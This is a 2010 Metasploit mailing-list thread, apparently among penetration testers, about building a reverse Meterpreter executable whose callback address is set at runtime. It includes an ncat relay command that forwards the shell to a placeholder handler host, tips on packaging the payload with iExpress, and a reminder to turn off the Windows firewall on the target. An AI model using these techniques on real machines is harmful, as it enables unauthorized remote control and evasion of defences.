Re: passing LHOST IP on command line

[archeldeeb <archeldeeb () gmail com>]

glad you found it useful.
Beware that even though you are after a reverse connection, this method will open a listening port at the target 
machine which will trigger any installed firewall, even window's one, so just as a reminder make sure windows firewall 
is turned off.

good luck finding a way to do it without that side effect.

Sherif eldeeb 
 


-----Original Message-----
From: Robin Wood <robin () digininja org>
Sent: 10 November, 2010 4:06 PM
To: Sherif El-Deeb <archeldeeb () gmail com>
Cc: framework () spool metasploit com; Oliver Kleinecke <okleinecke () web de>
Subject: Re: [framework] passing LHOST IP on command line

On 10 November 2010 13:02, Sherif El-Deeb <archeldeeb () gmail com> wrote:
> Even though I have no smart answer, but I think you'll have to pack
> the meterpreter.exe with ncat.exe using iExpress and drop them at
> %tmp% or something, then do port forwarding:
>
> Multi/Handler : LPORT=4444
> Meterpreter: LHOST=127.0.0.1 LPORT=9999
> ncat -l 9999 -e "ncat MULTI_HANDLER_IP 4444"
>
> so, my final answer would  be : one iExpress exe that contains
> meterpreter.exe that always connect to 127.0.0.1, ncat to do port
> forwarding and an optional dos batch file that will take
> themulti/handler's ip as a command argument "%1"

I'd say that was a pretty smart answer!

If I don't get any ways to do it directly in the exe then this is what
I'll be doing next time. And I agree that a batch file would be the
best way to go.

Robin

> Regards,
> Sherif Eldeeb.
>
>
> On Wed, Nov 10, 2010 at 3:09 PM, Robin Wood <robin () digininja org> wrote:
> > On 10 November 2010 11:40, Oliver Kleinecke <okleinecke () web de> wrote:
> > > I`d suggest to use the windows/meterpreter/reverse_tcp_dns payload, set its LHOST-value to a dyndns-name and set up 
> > > a dyndns-client on your listener-host.
> > > Hope this helps =).
> >
> > Unfortunately on an internal test without internet access this won't help.
> >
> > Robin
> >
> > > best regards
> > > Oliver
> > >
> > > -----Ursprüngliche Nachricht-----
> > > Von: "Robin Wood" <robin () digininja org>
> > > Gesendet: 10.11.2010 11:41:28
> > > An: "Metasploit List" <framework () spool metasploit com>
> > > Betreff: [framework] passing LHOST IP on command line
> > >
> > > > Is it possible to build a reverse meterpreter exe that will take its
> > > > LHOST as a command line argument rather than being hard coded?
> > > >
> > > > The scenario I have is:
> > > >
> > > > Got command line access to a windows box through the windows psexec
> > > > and managed to use tftp to bring files across to the compromised
> > > > machine. I'd like to have generic 32 and 64 bit exes stored on my tftp
> > > > server that I can copy across and then run them giving the IP of my
> > > > multi handler machine.
> > > >
> > > > This just seems easier than having to compile a new exe on each job
> > > > because my IP is different every time.
> > > >
> > > > Robin
> > > > _______________________________________________
> > > > https://mail.metasploit.com/mailman/listinfo/framework
> > > ___________________________________________________________
> > > WEB.DE DSL Doppel-Flat ab 19,99 &euro;/mtl.! Jetzt auch mit
> > > gratis Notebook-Flat! http://produkte.web.de/go/DSL_Doppel_Flatrate/2
> > _______________________________________________
> > https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework